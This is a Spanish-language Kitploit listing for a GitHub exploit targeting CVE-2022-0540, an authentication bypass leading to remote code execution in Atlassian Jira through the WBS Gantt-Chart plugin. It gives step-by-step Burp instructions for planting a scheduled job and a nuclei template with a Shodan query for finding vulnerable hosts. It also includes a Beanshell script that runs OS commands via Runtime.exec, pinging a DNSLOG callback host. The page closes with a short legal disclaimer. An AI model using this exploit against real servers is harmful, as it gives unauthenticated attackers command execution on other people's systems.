Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0540-RCE — Bypass de autenticación Seraph y RCE en Atlassian Jira(CVE-2022-0540) | Kitploit
Herramientas/GitHubGitHub/pear1y/cve-2022-0540-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónDesarrollo de Payloads
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Bypass de autenticación Seraph y RCE en Atlassian Jira(CVE-2022-0540)

Ver Repositorio
71136hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Atlassian Jira Seraph: RCE por bypass de autenticación (CVE-2022-0540)

Inglés • Chino

Detalles del exploit

Como se ve en el blog del autor, Atlassian proporcionó una larga lista de complementos afectados (la gran mayoría de los cuales eran falsos positivos), y el autor enumeró varios complementos realmente afectados

image-20220525190523282

De acuerdo con las condiciones indicadas, junto con la documentación oficial de WBS Gantt-Chart for Jira

image-20220525190607569

En esencia, es un RCE que utiliza el Beanshell Script del módulo Task del programador de trabajos; los detalles del exploit son los siguientes.

  1. Para la operación manual, es mejor usar la función de reemplazo de BurpSuite Proxy > Options > Match and Replace, edita la regla.

image-20220525190640472

  1. Usa burp como proxy para acceder al software Jira vulnerable, abre http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; y luego puedes comprobar la job scheduler configuration

image-20220525190657966

Como nuestro script final de Beanshell se ejecuta como una tarea programada, puedes modificar el intervalo de ejecución para tu comodidad haciendo clic en Editar y modificándolo según el formato Cron.

  1. Crea una tarea

image-20220525190713512

  1. Configura la tarea

image-20220525190728145

Después de completar la configuración, haz clic en Actualizar, pero salta a la página de inicio de sesión; no te preocupes, la tarea se ha añadido realmente en segundo plano.

  1. Habilita la tarea

image-20220525190740547

La tarea recién creada está deshabilitada por defecto; debes cambiarla a Habilitada manualmente y luego esperar unos segundos para que el Script se ejecute.

  1. Registro DNSLOG

image-20220525190756503

al mismo tiempo, puedes encontrar el aviso de que la ejecución se completó en el programador de trabajos.

image-20220525190830668


Requisitos previos

WBS Gantt-Chart for Jira <= 9.14.3.1

Verificar la explotabilidad

id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

Ejecutar demo

nuclei -l targets.txt -t exploit.yaml

Captura de pantalla

image-20220525173951955

Referencias

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Script de Beanshell

import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

La información mencionada en este artículo está destinada únicamente a pruebas de penetración legítimas y autorizadas, verificaciones de seguridad internas de la empresa y fines de investigación. El usuario es responsable de cualquier consecuencia adversa derivada del uso de la información proporcionada en este artículo.

Descargar herramienta